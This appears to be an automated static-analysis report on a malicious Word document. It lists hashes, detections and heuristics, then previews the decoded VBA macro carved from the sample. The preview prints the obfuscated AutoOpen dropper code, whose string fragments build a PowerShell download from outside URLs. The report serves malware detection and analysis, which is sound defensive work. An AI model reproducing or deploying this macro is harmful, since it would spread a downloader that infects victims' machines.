Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b859eab6113acdde…

MALICIOUS

Office (OLE)

Size: 99.5 KB
Created: 2018-02-12 11:55:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 9657a0f6cf298b92d8c202ebfe73d399
SHA-1: 8c47566287105d1ba9d99121a0ad23125ea6b2f0
SHA-256: b859eab6113acddebd201be486120caf32d3074225c0472dfe7ae633151eac27
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro calls the Shell() function, a critical indicator of execution, which suggests it is designed to download and execute a secondary payload. The ClamAV detection and the heuristic firings further confirm its malicious nature as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6446844-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6446844-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 25465 bytes
SHA-256: 3407e89f609ce959fe3b162a3129fdc6de83d82a457dcd418327dafe711bc7ed
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cSQXFDIjlpFH"
Sub AutoOpen()
On Error Resume Next
LqfiwSsNl = FQinzaqvSw - Sgn(BZKPLYdhdI) - (5142386 - Tan(511616) / 3120319 - ChrW(jwWzjXjiUYzri))
uKUuRcLJQ = OltPfIW - Sgn(NStQiTwia) - (180464 - Tan(4465312) / 887243 - ChrW(PUujXINJZEk))
QbHOpIBVw = mYkdfAwiBKmMj - Sgn(QzjIAIUnNJADLh) - (8667348 - Tan(3569941) / 9939852 - ChrW(Gsd))
Application.Run "jwUTbAFdCUJb", MoMUljkF
vKFrHPaXu = ErIwqcsVpYwLad - Sgn(pQpjKkFrV) - (3958623 - Tan(7878187) / 5123982 - ChrW(stuPSL))
wLCjCqGjQ = ikjcPSw - Sgn(ojNwAndBBbd) - (9372020 - Tan(5888098) / 6679374 - ChrW(PjQmhnsDEpXqk))
FwBZuJbjw = LPFApiDTowrTvz - Sgn(QwvfJIcwtv) - (656141 - Tan(5159000) / 681277 - ChrW(VHJ))
End Sub
Function MoMUljkF()
On Error Resume Next
JOFGwwDpajO = RNAELqMLFw - Sgn(iPqQjzOD) - (6902267 - Tan(7638780) / 1658486 - ChrW(PwAXuAfwH))
ZwIHq = CiTMlz - Sgn(NuO) - (1867285 - Tan(7596356) / 6984063 - ChrW(WWmDGONu))
XmooqwBfnO = klHL - Sgn(SLZzQNM) - (2314121 - Tan(9445219) / 4371566 - ChrW(RCWstT))
bkzDcdfbjPo = kwhNqIraG + Mid(GLOoNnV + "VCEBBVZzEP'+'R+GP'+'Rx6env:GPR+GPRpGPR+GPRubl'+'ic + LGPR+GPShHdrzcDOAZfZXIYGfjj" + USz, 10, 51)
ACSzaGCJ = BOQKvkSuzzFW - Sgn(DpNvj) - (6002601 - Tan(3916537) / 5290380 - ChrW(EHEpN))
vESiJSrczwJ = wwlDhMHHTRiB - Sgn(AmrGAN) - (1839074 - Tan(4018767) / 2223523 - ChrW(GJrPrJI))
wPlThChtLW = GWbv - Sgn(MBpwwhuiBdEaXN) - (316046 - Tan(675563) / 5292289 - ChrW(Vni))
YoswlJBnL = MaAYNbstDIW + Mid(bdmiujoLXXN + "NGPR+GPRM/?h'+'rw8+rw8mMGNTCEPSvnj" + ZPqoL, 2, 21)
UWspuvlMAaU = jHzwjjk - Sgn(awQVkiz) - (8505603 - Tan(2012184) / 8194527 - ChrW(WoaOCJvCDI))
aTFdopIzDw = MhzSwwLShDjWih - Sgn(SkMJKUcY) - (7207712 - Tan(6162517) / 1221293 - ChrW(zplhjKdmiYRkA))
SSjRPFHz = sJfpSwjfqL - Sgn(twbjJLmrDOcw) - (4141070 - Tan(16807) / 2231252 - ChrW(uou))
DAdSIfj = upzPwKLbioF + Mid(iELRNmQpEfno + "EOjbFnpHdUWBimie/r3AGPR+G'+'PRDutEfovSjUN" + vGCfSGH, 16, 16)
EddhDRU = wRPNJpGvlrvsN - Sgn(VzRPQYhrwiV) - (5660553 - Tan(2553032) / 9927181 - ChrW(sOiniNLNFjGGOa))
lBuVihvA = DhiCqClJv - Sgn(LFVk) - (8381841 - Tan(6199860) / 5460240 - ChrW(ztcN))
dfHIiNkO = fXJm - Sgn(jKSSQ) - (4334652 - Tan(5231822) / 7756884 - ChrW(KIvHEmjWHqcNDd))
JzZhoh = bJdcStvNK + Mid(Rwasm + "JIHGPRpolder'+'.nl/EAGPR+GPRQ6Y/?htGPR+GPRtps://spGPR+GPRor'+'tshuGPR+GPRb.oGPR+GPRutGPR+GPRcome.lirw8+rw8fvPoiznnjnizOSQWhFhQHK" + CCZMf, 4, 104)
ahAtBzwaLzw = jYl - Sgn(zfbfi) - (5296945 - Tan(157773) / 8542620 - ChrW(TsSKVMAQu))
FlMVpjzIPjL = PDqPOGZz - Sgn(VrEZ) - (4701297 - Tan(8339950) / 6451384 - ChrW(XVDwZjiwaro))
kwCPOsCizAi = USlp - Sgn(VHIPMZIbvXmOSu) - (3624860 - Tan(7772841) / 4967057 - ChrW(urdpXMTnP))
YZcifz = RjzpczfhQYdlos + Mid(wJDhRwBmXaYI + "TRfBi'+'x'+'FLfB + GPR+GPROxGPxCL+xCLR+Grw'+'8+rw8PR6GPR+GPRNSB + GPxCL+xCLR'+'miKAXuCvwJtnVjrtGC" + SJwdjS, 2, 78)
ScDJE = Tjzsr - Sgn(PDRzwILOUmf) - (3396992 - Tan(2975874) / 4931414 - ChrW(NOREWzcammXl))
CIVkG = pLiQFmD - Sgn(XtBNUUcJssHJ) - (3902557 - Tan(1134567) / 3536743 - ChrW(nVjnciLZWr))
JOUNjqsu = JEPLdWwq - Sgn(QqBizQu) - (8902152 - Tan(2980998) / 5445724 - ChrW(jsAckCPOsicqcv))
vWNjNWVWn = skDFPaCjYWLw + Mid(UiJshIzVSuprz + "MYkjuHGzUk -cREZSWVfi" + jjwwYKXj, 11, 5)
bXHHX = QNkpi - Sgn(vjfRzbC) - (1510777 - Tan(3377304) / 3599844 - ChrW(jECBrFEfkRKczt))
XLMVOP = HAUDYFOW - Sgn(UGJcfiq) - (4078435 - Tan(4155847) / 627953 - ChrW(idJYIjJtCkHi))
DbLMBL = bTBnOtrV - Sgn(hhlwbACbpG) - (8804902 - Tan(838164) / 8224757 - ChrW(qvusvVUkNX))
hiTsWUutKC = FdjimVPzQ + Mid(TFoMkQJusqQDma + "BwWGiwmHOSPR,[rw8+rw8STRINgxCL+xCL][cHAxCL+xCLR]34).repLACe('+'([cHAR]79+[rw8+rw8cHrw8+rw8AR]120+[cHAR]54'+'),GPR1xCL+xCLs5GPR).'+'repLACe(GPRLfBGPR,[STRINgxCL+xCL][rw8+rw8cHAR'+'HCiHDNhvsORlbjjzCRzELjGfQzdDZ" + GkzmozZjj, 11, 169)
InKopmnznG = LrTBvzNzUNKa - Sgn(WYifiktjOIjo) - (7407636 - Tan(5952910
... (truncated)